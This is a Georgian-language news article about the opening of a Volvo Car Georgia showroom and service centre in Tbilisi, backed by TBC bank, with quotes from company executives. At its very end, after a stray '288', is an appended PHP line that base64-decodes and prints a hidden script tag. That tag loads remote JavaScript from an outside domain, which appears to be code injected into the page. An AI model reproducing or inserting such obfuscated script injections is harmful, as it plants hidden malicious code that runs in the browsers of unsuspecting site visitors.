celsiusi
ავერსი შნაიდერი
 თბილისში უნივერსიტეტის ქუჩის 6 ნომერში, თიბისი ჯგუფის მხარდაჭერით, ,,ვოლვო ქარ საქართველოს“ შოურუმი გაიხსნა. პროექტში 15 მილიონი ლარის ინვესტიცია განხორციელდა.

1200 კვადრატულ მეტრზე განლაგებული ,,ვოლვო ქარ საქართველოს“ შოურუმი საექსპოზიციო და მომსახურებისათვის განკუთვნილ სივრცეებს აერთიანებს.

შოურუმში შვედური ბრენდის ავტომობილების სამოდელო რიგთან ერთად, აქსესუარების დიდი არჩევანია წარმოდგენილი. მომხმარებელი შეძლებს დაათვალიეროს ვოლვოს მოდელები, სურვილის შემთხვევაში საკუთარი გემოვნებით და მასალებით შეარჩიოს ავტომობილი და ისარგებლოს ტესტ დრაივით.

შოურუმის სახურავზე 325 ვატის სიმძლავრის მზის პანელებია დამონტაჟებული, რომლებიც წელიწადში 442 500 კილოვატ ელექტროენერგიას გამოიმუშავებს.

შოურუმის 1500 კვადრატულ მეტრზე გაშენებულ პარკინგსა და ეზოში ელექტოფიცირებული ავტომობილებისთვის დასამუხტი სადგურებია დამონტაჟებული.

საერთაშორისო სტანდარტით აშენდა სერვისცენტრის ნაწილიც, სადაც ავტომობილისთვის საჭირო ყველა ტექნიკური მომსახურება გაერთიანდა. მათ შორის, ელექტრობა, სავალი ნაწილებისა და ძრავის მიმართულება. მომხმარებელს პერსონალური მენეჯერი ეყოლება, რომელიც ზუსტად იცნობს კონკრეტული ავტომობილის ისტორიას.

„ვოვლო ქარ საქართველოს“ მომსახურების ცენტრი პირველი ლოკაციაა კავკასიის რეგიონში, რომელიც VRE (Volvo Retail Experience) კონცეფციით შეიქმნა და შვედეთში არსებული შოურუმების ანალოგია.

„ვოლვო ქარ საქართველოს ისტორიაში განსაკუთრებული დღეა, ჩვენი სრულიად ახალი კონცეპტუალური შოურუმი ოფიციალურად გახსნილია. სივრცე, სადაც დღეს ჩვენს სტუმრებს და მომხმარებელს ვმასპინძლობთ გამორჩეულია არა მხოლოდ თავისი მასშტაბურობით, არამედ იმ მიდგომებით, რომელსაც ვოლვო ქარსი წლებია ავტოინდუსტრიაში ექსკლუზიურად ნერგავს. ერთგულად მივყვებით შვედური ბრენდის მიერ არჩეულ ხაზს და მომხმარებელს ავტომობილის შეძენის და ფლობის სრულიად ახალ გამოცდილებას ვთავაზობთ. 2019 წლიდან ვოლვო ქარსის ოფიციალური წარმომადგენლები ვართ, დღეს კი რეგიონში ვოლვოს პირველი, ინოვაციური VRE შოურუმის გახსნით უპრეცედენტო პროექტი დავასრულეთ“, - გაგა კოხრეიძე, ,,ვოლვო ქარ კავკასიის“ დირექტორი.

„უკვე 25 წელზე მეტია “თეგეტა ჰოლდინგის” და თიბისის პარტნიორობა გრძელდება. ამ წარმატებული თანამშრომლობის საუკეთესო მაგალითია „ვოლვოს“ ახალი, თანამედროვე ტექნოლოგიებით აღჭურვილი შოურუმი. როგორც ქართული ბიზნესის ნომერ პირველ პარტნიორს, ძალიან გვიხარია, როდესაც ვხედავთ, რომ ბაზარზე, თიბისის მხარდაჭერით, საერთაშორისო სტანდარტების შესაბამისი ცენტრი გაიხსნა“, - გიორგი თხელიძე, თიბისის გენერალური დირექტორის მოადგილე.

ახალ შოურუმში თიბისი დაზღვევის, თიბისი კონცეპტისა და თიბისი WM-ის მომხმარებლები, სპეციალური პირობებით ისარგებლებენ.

„თეგეტა ჰოლდინგის“ ერთ-ერთ მიმართულებაში, „თეგეტა ქარსში“ შემავალი კომპანია - “ვოლვო ქარ კავკასია”, რომელიც საქართველოსთან ერთად, აზერბაიჯანს, სომხეთს, ყაზახეთსა და უზბეკეთსაც ფარავს, ახალი შოურუმების გახსნას რეგიონის სხვა ქვეყნებშიც გეგმავს.

288
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");